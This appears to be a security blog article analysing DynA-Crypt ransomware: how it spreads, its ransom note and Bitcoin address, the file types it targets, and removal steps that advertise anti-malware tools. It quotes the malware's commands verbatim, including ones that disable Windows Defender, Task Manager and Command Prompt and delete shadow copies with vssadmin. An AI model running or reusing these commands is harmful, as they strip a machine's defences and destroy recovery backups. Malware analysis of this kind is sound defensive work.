Hey you,
BE IN THE KNOW!

35,000 ransomware infections per month and you still believe you are protected?

Sign up to receive:

  • alerts
  • news
  • free how-to-remove guides

of the newest online threats - directly to your inbox:


Remove DynA-Crypt Virus and Restore .crypt Files

The article will help you remove DynA-Crypt ransomware entirely. Follow the ransomware removal instructions at the bottom of the article.

DynA-Crypt is a ransomware cryptovirus. This virus will encrypt your files and append the extension .crypt to every one of them. The encryption algorithm is believed to be AES. DynA-Crypt cryptovirus will create a ransom note and display it with a graphical interface. Read on through and see how you could try to potentially restore some of your files.

Threat Summary

NameDynA-Crypt
TypeRansomware
Short DescriptionThe ransomware encrypts files on your computer, kills lots of processes and drops a ransom message after that.
SymptomsThe ransomware will encrypt your files and put the extension .crypt on your files after it completes its encryption process.
Distribution MethodSpam Emails, Email Attachments
Detection Tool See If Your System Has Been Affected by DynA-Crypt

Download

Malware Removal Tool

User ExperienceJoin Our Forum to Discuss DynA-Crypt.
Data Recovery ToolWindows Data Recovery by Stellar Phoenix Notice! This product scans your drive sectors to recover lost files and it may not recover 100% of the encrypted files, but only few of them, depending on the situation and whether or not you have reformatted your drive.

DynA-Crypt Virus – Infection

DynA-Crypt ransomware could spread its infection with various methods. The payload file that initiates the malicious script for the ransomware in question is seen in the Wild. Your computer system will become infected if that payload is executed. One such payload dropper has been reported on the VirusTotal service which also drops a backdoor:

DynA-Crypt ransomware might also distribute its payload file on social media and file-sharing networks. Freeware distributed on the Internet can be presented as helpful but could also hide the malicious script for this cryptovirus. Refrain from opening files right after you have downloaded them, especially if they come from dubious sources like links and emails. Instead, you should scan them with a security tool, beforehand. Also you should do a check on the size and signatures of these files, for anything unusual. Read the tips for ransomware prevention from the forum to know more ways to avoid infection.

DynA-Crypt Virus – Information

DynA-Crypt ransomware is believed to be made with a Dynamite malware creation toolkit. Malware researchers have seen the similarities in the code.

DynA-Crypt ransomware executes Powershell commands, which shut down the administration part of the Windows Operating System almost entirely, along with many other features. Below are probably the most important commands, which the virus executes:

Disables the Command Prompt:

→REG add “HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System” /v DisableCMD /t REG_DWORD /d 2 /f

Disables your Task Manager:

→REG add “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System” /v DisableTaskMgr /t REG_DWORD /d 1 /f

Disables the anti-spyware Windows Defender service:

→net stop WinDefend; sc config WinDefend= disabled; REG add “HKLM\SYSTEM\CurrentControlSet\services\WinDefend” /v Start /t REG_DWORD /d 4 /f; REG add “HKLM\SOFTWARE\Policies\Microsoft\Windows Defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f; sc delete windefend

DynA-Crypt also kills the following processes:

→kill -processname IExplore -Force; kill -processname MicrosoftEdge -Force
kill -processname Steam -Force
kill -processname Skype -Force
kill -processname Chrome -Force
kill -processname Firefox -Force
kill -processname ts3client_win64 -Force
kill -processname Origin -Force
kill -processname Word -Force
kill -processname Excel -Force
kill -processname Powerpoint -Force
kill -processname Pidgin -Force
kill -processname Opera -Force
kill -processname CyberGhost -Force
kill -processname iTunes -Force; kill -processname iTunesHelper -Force; kill -processname iPodService -Force
kill -processname vlc -Force

Commands in the code of the ransomware that set up a Keylogger:
List with commands for a Keylogger
Stops the Windows Update service:

→net stop wuauserv

Deletes the Shadow Volume Copies on all possible disk drives:

→net stop VSS; REG add “HKLM\SYSTEM\CurrentControlSet\services\VSS” /v Start /t REG_DWORD /d 4 /f; vssadmin delete shadows /for=c: /all /quiet; vssadmin delete shadows /for=d: /all /quiet; vssadmin delete shadows /for=e: /all /quiet; vssadmin delete shadows /for=f: /all /quiet; vssadmin delete shadows /for=g: /all /quiet; vssadmin delete shadows /for=x: /all /quiet; vssadmin delete shadows /for=y: /all /quiet; vssadmin delete shadows /for=z: /all /quiet

Source: Pastebin.com

Except the logging of keystrokes, the DynA-Crypt virus creates screenshots, and tries to establish a remote connection. After all these commands come into play, a window pops up, showing you the ransom note.

This is how the note looks like:

The ransom note of DynA-Crypt reads the following:

DynA-Crypt
All your important files are encrypted
Your computer has been blocked
If you want unlock send 50 $ BTC
To this wallet if not files will be
Randomly deleting every 5 minutes
1JzypNfNnJRWRFJFxNo5qAt13vYmxqeEz5

From the note of the DynA-Crypt ransomware the following Bitcoin address is given for you to pay for unlocking your files – 1JzypNfNnJRWRFJFxNo5qAt13vYmxqeEz5. However, you should NOT under any circumstance pay the cybercriminals, nor contact them. Your files may not get restored, and nobody could give you a guarantee for that. Furthermore, giving money to these criminals will likely motivate them to spread more malware or do other criminal activity.

The following list contains all file extensions that the DynA-Crypt ransomware seeks to encrypt:

→.001, .jpg, .jpeg, .docx, .doc, .xlsx, .xls, .ppt, .pdf, .mp4, .mp3, .mov, .mkv, .png, .pst, .odt, .avi, .pptx, .msg, .rar, .mdb, .zip, .m4a, .csv

Every file that gets encrypted will receive the same extension appended to them, and that is the .crypt extension. Malware researchers believe that the encryption algorithm which is utilized by this ransomware is AES.

Continue reading and check out what kinds of ways you can try to potentially restore some of your files.

Remove DynA-Crypt Virus and Restore .crypt Files

If your computer got infected with the DynA-Crypt ransomware virus, you should have a bit of experience in removing malware. You should get rid of this ransomware as quickly as possible before it can have the chance to spread further and infect other computers. You should remove the ransomware and follow the step-by-step instructions guide provided below.

Manually delete DynA-Crypt from your computer

Note! Substantial notification about the DynA-Crypt threat: Manual removal of DynA-Crypt requires interference with system files and registries. Thus, it can cause damage to your PC. Even if your computer skills are not at a professional level, don’t worry. You can do the removal yourself just in 5 minutes, using a malware removal tool.

1. Boot Your PC In Safe Mode to isolate and remove DynA-Crypt files and objects
2.Find malicious files created by DynA-Crypt on your PC

Automatically remove DynA-Crypt by downloading an advanced anti-malware program

1. Remove DynA-Crypt with SpyHunter Anti-Malware Tool and back up your data
2. Restore files encrypted by DynA-Crypt
Optional: Using Alternative Anti-Malware Tools

Berta Bilbao

Berta is the Editor-in-Chief of SensorsTechForum. She is a dedicated malware researcher, dreaming for a more secure cyber space.

More Posts - Website

Share on Facebook Share
Loading...
Share on Twitter Tweet
Loading...
Share on Google Plus Share
Loading...
Share on Linkedin Share
Loading...
Share on Digg Share
Share on Reddit Share
Loading...
Share on Stumbleupon Share
Loading...
Please wait...

Subscribe to our newsletter

Want to be notified when our article is published? Enter your email address and name below to be the first to know.